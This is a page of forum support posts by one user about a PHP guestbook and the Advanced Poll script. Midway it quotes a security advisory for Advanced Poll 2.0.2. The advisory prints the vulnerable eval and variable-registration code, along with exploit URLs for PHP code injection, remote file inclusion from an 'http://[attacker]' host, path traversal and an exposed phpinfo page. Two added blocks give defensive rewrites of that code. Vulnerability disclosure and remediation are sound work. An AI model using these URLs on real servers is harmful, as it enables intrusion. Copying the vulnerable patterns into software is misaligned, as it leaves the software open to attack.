Messages posted by: Jam'n
Hi Trevor,

Take a look here
Seems the exploit was possible through a bug in the PHP version you use.
So if your hosting company has the latest version then the bug doesn't work.
You will need phpMyAdmin for this.

To reset your password:

Select the Guestbook database
Now, on the right side of the screen, select SQL
Now insert in the Data Entry Field the following lines:



And click "GO"

This will reset your account to:

User name: test
Password: 123

Also read this topic: http://proxy2.de/forum/viewtopic.php?t=3037
www.starelement.com works for me.

And yes, both the guestbook tutorials were made by me.
If it's correct they should be the same.

Yep they are both version 1.4 and that's the latest version.
Login as an admin and use:

To check your environmental variables, click here.

and then check whether "file_uploads" is on.

This means you can upload files; if it's off, you can't.
Auron, JTD and Brianr

Thanks guys and good luck with the rest.

@ Auron: I love the new design you made
Thanks Yumiko.
But I’m stopping my support and development for the guestbook, because I have some other obligations and priorities.
So you will not find any help anymore at Procaz.
Use the search button:

http://proxy2.de/forum/viewtopic.php?t=2934&highlight=reset+password
The link doesn't work and when I go to the root (http://www.z-gal.com/)
I get this error:

Warning: main(./conf_global.php): failed to open stream: No such file or directory in /home/z-gal/public_html/index.php on line 93
FrontPage doesn't support PHP.
It seems there is also a bug in Advanced Poll 2.0.2


°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo



PHP Code/Location :
°°°°°°°°°°°°°°°°°°°


comments.php :


------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
    if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = \"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
    } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
        eval("\$$register_poll_vars[$i] = \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
    } else {
        eval("\$$register_poll_vars[$i] = '';");
    }
}
[...]
------------------------------------------------------------------------------------------------------
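As an added example (not code from Advanced Poll or from the advisory), here is the same variable registration that the comments.php loop above performs, written without eval(). The advisory's injection works because eval() turns the request value into PHP source, so a value beginning with `";` closes the string literal and the rest is executed; in the version below the value is only ever data. The function name, the PHP 7+ `??` operator and the per-field patterns are assumptions about what each field is expected to hold.

```php
<?php
// Added example, not Advanced Poll's code: copy id/template_set/action from
// POST, then GET, else '' (the original's precedence) without eval().

function register_poll_vars(array $post, array $get): array
{
    // Allowlist of names, each with the shape its value is expected to have
    // (assumed shapes; adjust to the real field semantics).
    $expected = [
        'id'           => '/^\d{1,10}$/',            // numeric poll id
        'template_set' => '/^[A-Za-z0-9_-]{1,32}$/', // template directory name
        'action'       => '/^[a-z_]{1,20}$/',        // command word
    ];
    $vars = [];
    foreach ($expected as $name => $pattern) {
        // Same precedence as the original loop: POST wins over GET, else ''.
        $raw = trim((string)($post[$name] ?? $get[$name] ?? ''));
        // A value that does not match is dropped, not "cleaned"; the rest of
        // the script then sees '' exactly as it would for a missing field.
        $vars[$name] = preg_match($pattern, $raw) === 1 ? $raw : '';
    }
    return $vars;
}

// Constructed sample request: one field carries the advisory's placeholder
// payload, which here stays an ordinary (and rejected) string.
$vars = register_poll_vars(
    ['action' => 'vote'],                                                        // POST
    ['id' => '";[PHPCODE]//', 'template_set' => 'default', 'action' => 'ignored'] // GET
);
foreach ($vars as $name => $value) {
    echo $name, ' => ', var_export($value, true), "\n";
}
```

Because the variables are written into a fixed array instead of being created by name, nothing a request sends can define or overwrite any other variable in the script, which is the same property register_globals=OFF is meant to give.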




booth.php, png.php :


---------------------------------------------------------------
<?php


$include_path = dirname(__FILE__);
if ($include_path == "/") {
    $include_path = ".";
}

if (!isset($PHP_SELF)) {
    global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_COOKIE_VARS)) {
        while (list($name, $value)=each($HTTP_COOKIE_VARS)) {
            $$name=$value;
        }
    }
}

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------



poll_ssi.php, popup.php :


----------------------
include "./booth.php";
----------------------





admin/common.inc.php :


---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
    $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
    if (isset($HTTP_GET_VARS)) {
        while (list($name, $value)=each($HTTP_GET_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_POST_VARS)) {
        while (list($name, $value)=each($HTTP_POST_VARS)) {
            $$name=$value;
        }
    }
    if (isset($HTTP_COOKIE_VARS)) {
        while (list($name, $value)=each($HTTP_COOKIE_VARS)) {
            $$name=$value;
        }
    }
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
    include ("$base_path/lang/$pollvars[lang]");
} else {
    include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------



In the /admin/ directory, in the files :


- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php


:


------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);


require "./common.inc.php";
[...]
------------------------------------



misc/info.php :


-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------



Exploits :
°°°°°°°°


- if magic_quotes_gpc=OFF :


http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//


or with a POST form or cookies.


- This will only work if register_globals=OFF (this is not an error...) :


http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php


- This will work if register_globals=OFF OR ON :


http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.


The same hole can be found, in the /admin/ directory, in the files :


- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php


but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view



- http://[target]/misc/info.php will show the phpinfo().
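The include holes above all come from the same two habits: the include base ($include_path, $base_path) is a plain variable that a request can overwrite, and the requested language file ($pollvars[lang]) is joined into a path without being checked. The following added example (not Advanced Poll's code and not the patch the advisory refers to) shows how a language file can be selected safely: the base directory is fixed by the script itself and never read from the request, and the requested name must be a bare file name that resolves to a file directly inside lang/. The function name, the regular expression and the throwaway demo directory are assumptions.

```php
<?php
// Added example, not Advanced Poll's code. In a real script the base would
// be fixed as  $base_path = dirname(__DIR__);  for a file in admin/, and the
// request would never be allowed to define $base_path or $include_path.

function select_lang_file(string $lang_dir, $requested): string
{
    $lang_dir = realpath($lang_dir);
    $default  = $lang_dir . DIRECTORY_SEPARATOR . 'english.php';

    // Accept only a bare file name of the expected shape (assumed pattern).
    // This alone rejects "../" and "http://" values; the checks below are
    // defence in depth.
    if (!is_string($requested) || !preg_match('/^[a-z]{2,16}\.php$/', $requested)) {
        return $default;
    }
    $candidate = realpath($lang_dir . DIRECTORY_SEPARATOR . $requested);
    // realpath() resolves symlinks and ../; the result must still be an
    // existing file whose parent directory is lang/ itself.
    if ($candidate === false || !is_file($candidate) || dirname($candidate) !== $lang_dir) {
        return $default;
    }
    return $candidate;
}

// --- constructed demo environment: a throwaway lang/ dir with two files ---
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'poll_demo_' . getmypid();
mkdir($tmp . '/lang', 0700, true);
file_put_contents($tmp . '/lang/english.php', "<?php \$lang['hello'] = 'Hello';\n");
file_put_contents($tmp . '/lang/deutsch.php', "<?php \$lang['hello'] = 'Hallo';\n");
file_put_contents($tmp . '/secret.txt', "not a language file\n");

$cases = [
    'deutsch.php',                   // legitimate request
    '../secret.txt',                 // traversal out of lang/
    '../../../file/to/view',         // the advisory's example value
    'http://[attacker]/lang/x.php',  // remote URL
    null,                            // pollvars[lang] not sent at all
];
foreach ($cases as $req) {
    $chosen = select_lang_file($tmp . '/lang', $req);
    echo str_pad(var_export($req, true), 32), ' => ', basename($chosen), "\n";
}

// cleanup of the demo directory
foreach (glob($tmp . '/lang/*') as $f) {
    unlink($f);
}
unlink($tmp . '/secret.txt');
rmdir($tmp . '/lang');
rmdir($tmp);
```

Only the first case resolves to deutsch.php; every other request falls back to english.php. The same pattern applies to $template_set in the other files: treat the request value as a key to look up in a fixed directory, never as a path fragment.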



Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .



Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info
Hi,

Amber222 is right, most of the time this is a chmod question.
You shouldn't set Memorial to 777, because you give everybody write permission to your root directory.

Here is how I have the chmod setup:

admin 755
doc 755
img 755
lang 755
lib 755
public 777
templates 777
tmp 777
Messages such as 'Thankyou for stopping by my site...' are contained in the file english.php in the lang sub-directory.
No known exploits yet (as far as I know).
 
Based on the open source JForum